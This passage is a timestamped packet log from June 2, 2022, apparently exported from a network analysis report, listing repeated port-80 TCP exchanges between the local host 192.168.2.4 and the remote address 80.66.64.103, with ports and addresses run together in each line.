                                                                              Jun 2, 2022 01:54:00.394355059 CEST4978780192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:00.482666969 CEST804978780.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:00.537727118 CEST4978880192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:00.630336046 CEST804978880.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:00.630537033 CEST4978880192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:00.640844107 CEST4978880192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:00.776566029 CEST804978880.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:00.823488951 CEST804978880.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:00.823694944 CEST4978880192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:00.842470884 CEST4978880192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:00.934755087 CEST804978880.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:00.969235897 CEST4978980192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:01.061872959 CEST804978980.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:01.062004089 CEST4978980192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:01.077017069 CEST4978980192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:01.211293936 CEST804978980.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:01.258260965 CEST804978980.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:01.261194944 CEST4978980192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:01.293272018 CEST4978980192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:01.386054039 CEST804978980.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:01.410721064 CEST4979080192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:01.501754999 CEST804979080.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:01.501837015 CEST4979080192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:01.502536058 CEST4979080192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:01.635401964 CEST804979080.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:01.682502031 CEST804979080.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:01.685172081 CEST4979080192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:01.703054905 CEST4979080192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:01.794285059 CEST804979080.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:01.861426115 CEST4979180192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:01.952436924 CEST804979180.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:01.960135937 CEST4979180192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:01.965477943 CEST4979180192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:02.099128962 CEST804979180.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:02.146214008 CEST804979180.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:02.146372080 CEST4979180192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:02.168396950 CEST4979180192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:02.259355068 CEST804979180.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:02.312980890 CEST4979280192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:02.408035994 CEST804979280.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:02.408157110 CEST4979280192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:02.409045935 CEST4979280192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:02.544487953 CEST804979280.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:02.592430115 CEST804979280.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:02.592514992 CEST4979280192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:02.599174023 CEST4979280192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:02.694145918 CEST804979280.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:02.707720995 CEST4979380192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:02.801486015 CEST804979380.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:02.801636934 CEST4979380192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:02.814058065 CEST4979380192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:02.951545000 CEST804979380.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:02.996304989 CEST804979380.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:02.996387005 CEST4979380192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:02.996542931 CEST4979380192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:03.090143919 CEST804979380.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:03.116494894 CEST4979480192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:03.208750963 CEST804979480.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:03.208884001 CEST4979480192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:03.209829092 CEST4979480192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:03.344079018 CEST804979480.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:03.389816999 CEST804979480.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:03.390031099 CEST4979480192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:03.390106916 CEST4979480192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:03.483628035 CEST804979480.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:03.507929087 CEST4979580192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:03.603449106 CEST804979580.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:03.603564024 CEST4979580192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:03.603998899 CEST4979580192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:03.739962101 CEST804979580.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:03.787997007 CEST804979580.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:03.788166046 CEST4979580192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:04.044015884 CEST4979580192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:04.139715910 CEST804979580.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:04.365401983 CEST4979680192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:04.457464933 CEST804979680.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:04.457583904 CEST4979680192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:04.522416115 CEST4979680192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:04.656054020 CEST804979680.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:04.702900887 CEST804979680.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:04.703099012 CEST4979680192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:05.459135056 CEST4979680192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:05.550321102 CEST804979680.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:07.585103035 CEST4979780192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:07.677692890 CEST804979780.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:07.677784920 CEST4979780192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:07.717713118 CEST4979780192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:07.856062889 CEST804979780.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:07.904081106 CEST804979780.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:07.904242992 CEST4979780192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:08.132802963 CEST4979780192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:08.224657059 CEST804979780.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:08.257721901 CEST4979880192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:08.348545074 CEST804979880.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:08.348675966 CEST4979880192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:08.357861996 CEST4979880192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:08.492815971 CEST804979880.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:08.537884951 CEST804979880.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:08.537991047 CEST4979880192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:08.617695093 CEST4979880192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:08.708255053 CEST804979880.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:08.748670101 CEST4979980192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:08.843727112 CEST804979980.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:08.843875885 CEST4979980192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:08.864610910 CEST4979980192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:09.004240036 CEST804979980.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:09.051507950 CEST804979980.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:09.051605940 CEST4979980192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:09.077171087 CEST4979980192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:09.173479080 CEST804979980.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:09.370626926 CEST4980080192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:09.465464115 CEST804980080.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:09.465586901 CEST4980080192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:09.502749920 CEST4980080192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:09.639698982 CEST804980080.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:09.686487913 CEST804980080.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:09.689568996 CEST4980080192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:09.706576109 CEST4980080192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:09.801559925 CEST804980080.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:10.071460962 CEST4980180192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:10.163466930 CEST804980180.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:10.163604975 CEST4980180192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:10.166146994 CEST4980180192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:10.299535036 CEST804980180.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:10.346992016 CEST804980180.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:10.347105026 CEST4980180192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:10.368871927 CEST4980180192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:10.459984064 CEST804980180.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:10.598367929 CEST4980280192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:10.689815044 CEST804980280.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:10.689927101 CEST4980280192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:10.716389894 CEST4980280192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:10.851295948 CEST804980280.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:10.897917032 CEST804980280.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:10.897998095 CEST4980280192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:10.923544884 CEST4980280192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:11.014846087 CEST804980280.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:11.044279099 CEST4980380192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:11.138849974 CEST804980380.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:11.138966084 CEST4980380192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:11.166089058 CEST4980380192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:11.304282904 CEST804980380.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:11.350131989 CEST804980380.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:11.350267887 CEST4980380192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:11.413352966 CEST4980380192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:11.507654905 CEST804980380.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:11.583163977 CEST4980480192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:11.677755117 CEST804980480.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:11.677858114 CEST4980480192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:11.691875935 CEST4980480192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:11.827230930 CEST804980480.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:11.876013041 CEST804980480.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:11.876162052 CEST4980480192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:11.909780025 CEST4980480192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:12.004189014 CEST804980480.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:12.193715096 CEST4980580192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:12.287852049 CEST804980580.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:12.287992954 CEST4980580192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:12.457299948 CEST4980580192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:12.595429897 CEST804980580.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:12.640063047 CEST804980580.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:12.640326023 CEST4980580192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:12.699326992 CEST4980580192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:12.793641090 CEST804980580.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:12.895374060 CEST4980680192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:12.985529900 CEST804980680.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:12.985651970 CEST4980680192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:12.991151094 CEST4980680192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:13.122668028 CEST804980680.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:13.170902014 CEST804980680.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:13.171355963 CEST4980680192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:13.191138029 CEST4980680192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:13.281510115 CEST804980680.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:13.442848921 CEST4980780192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:13.533246994 CEST804980780.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:13.533468008 CEST4980780192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:13.581561089 CEST4980780192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:13.715322018 CEST804980780.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:13.761343002 CEST804980780.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:13.761523008 CEST4980780192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:13.786462069 CEST4980780192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:13.877322912 CEST804980780.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:13.963912010 CEST4980880192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:14.057871103 CEST804980880.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:14.058029890 CEST4980880192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:14.080650091 CEST4980880192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:14.215547085 CEST804980880.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:14.265993118 CEST804980880.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:14.266134024 CEST4980880192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:14.297323942 CEST4980880192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:14.390989065 CEST804980880.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:14.448982000 CEST4980980192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:14.540170908 CEST804980980.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:14.540254116 CEST4980980192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:14.556780100 CEST4980980192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:14.691176891 CEST804980980.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:14.736346960 CEST804980980.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:14.736479998 CEST4980980192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:14.754844904 CEST4980980192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:14.846071959 CEST804980980.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:15.179322004 CEST4981080192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:15.271301985 CEST804981080.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:15.271405935 CEST4981080192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:15.300527096 CEST4981080192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:15.438010931 CEST804981080.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:15.483221054 CEST804981080.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:15.483509064 CEST4981080192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:15.488774061 CEST4981080192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:15.580919027 CEST804981080.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:15.630789995 CEST4981180192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:15.723330975 CEST804981180.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:15.723509073 CEST4981180192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:15.765337944 CEST4981180192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:15.900547981 CEST804981180.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:15.946785927 CEST804981180.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:15.946945906 CEST4981180192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:15.960333109 CEST4981180192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:16.054008007 CEST804981180.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:16.240348101 CEST4981280192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:16.331691027 CEST804981280.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:16.331871033 CEST4981280192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:16.364540100 CEST4981280192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:16.499239922 CEST804981280.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:16.544522047 CEST804981280.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:16.544696093 CEST4981280192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:16.552973986 CEST4981280192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:16.643728971 CEST804981280.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:16.712544918 CEST4981380192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:16.804246902 CEST804981380.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:16.804394007 CEST4981380192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:16.846545935 CEST4981380192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:16.978439093 CEST804981380.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:17.025465965 CEST804981380.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:17.025660038 CEST4981380192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:17.073487997 CEST4981380192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:17.164752960 CEST804981380.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:17.210092068 CEST4981480192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:17.302625895 CEST804981480.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:17.302767038 CEST4981480192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:17.528471947 CEST4981480192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:17.664357901 CEST804981480.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:17.710797071 CEST804981480.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:17.710871935 CEST4981480192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:17.719316959 CEST4981480192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:17.813069105 CEST804981480.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:18.225963116 CEST4981580192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:18.326845884 CEST804981580.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:18.326984882 CEST4981580192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:18.395076036 CEST4981580192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:18.531111956 CEST804981580.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:18.579144001 CEST804981580.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:18.579323053 CEST4981580192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:18.603122950 CEST4981580192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:18.696315050 CEST804981580.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:18.801980019 CEST4981680192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:18.896575928 CEST804981680.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:18.896699905 CEST4981680192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:18.919404984 CEST4981680192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:19.054786921 CEST804981680.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:19.103904963 CEST804981680.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:19.104069948 CEST4981680192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:19.133296013 CEST4981680192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:19.227819920 CEST804981680.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:19.328532934 CEST4981780192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:19.422480106 CEST804981780.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:19.422652960 CEST4981780192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:19.458105087 CEST4981780192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:19.595392942 CEST804981780.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:19.643877029 CEST804981780.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:19.644011021 CEST4981780192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:19.676090956 CEST4981780192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:19.769850969 CEST804981780.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:20.026251078 CEST4981880192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:20.117253065 CEST804981880.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:20.117377996 CEST4981880192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:20.253472090 CEST4981880192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:20.387279034 CEST804981880.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:20.432085991 CEST804981880.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:20.432194948 CEST4981880192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:20.446382046 CEST4981880192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:20.537172079 CEST804981880.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:20.641968012 CEST4981980192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:20.733895063 CEST804981980.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:20.733999014 CEST4981980192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:20.991168976 CEST4981980192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:21.123959064 CEST804981980.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:21.171302080 CEST804981980.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:21.171413898 CEST4981980192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:21.223365068 CEST4981980192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:21.315757036 CEST804981980.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:21.455780983 CEST4982080192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:21.550580978 CEST804982080.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:21.550688028 CEST4982080192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:21.626939058 CEST4982080192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:21.764523983 CEST804982080.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:21.811204910 CEST804982080.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:21.811377048 CEST4982080192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:21.835932970 CEST4982080192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:21.930685043 CEST804982080.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:22.085567951 CEST4982180192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:22.176800013 CEST804982180.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:22.176951885 CEST4982180192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:22.195677996 CEST4982180192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:22.331621885 CEST804982180.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:22.377880096 CEST804982180.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:22.377973080 CEST4982180192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:22.420375109 CEST4982180192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:22.511636019 CEST804982180.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:22.595597982 CEST4982280192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:22.690804958 CEST804982280.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:22.690917015 CEST4982280192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:22.723931074 CEST4982280192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:22.860449076 CEST804982280.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:22.908207893 CEST804982280.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:22.908370972 CEST4982280192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:22.959712029 CEST4982280192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:23.055015087 CEST804982280.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:23.180763960 CEST4982380192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:23.274462938 CEST804982380.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:23.274565935 CEST4982380192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:23.851394892 CEST4982380192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:23.987320900 CEST804982380.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:24.035742044 CEST804982380.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:24.035933018 CEST4982380192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:24.176992893 CEST4982380192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:24.270876884 CEST804982380.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:26.781512022 CEST4982480192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:26.873775959 CEST804982480.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:26.873922110 CEST4982480192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:26.976248980 CEST4982480192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:27.106928110 CEST804982480.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:27.155880928 CEST804982480.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:27.156141996 CEST4982480192.168.2.480.66.64.103
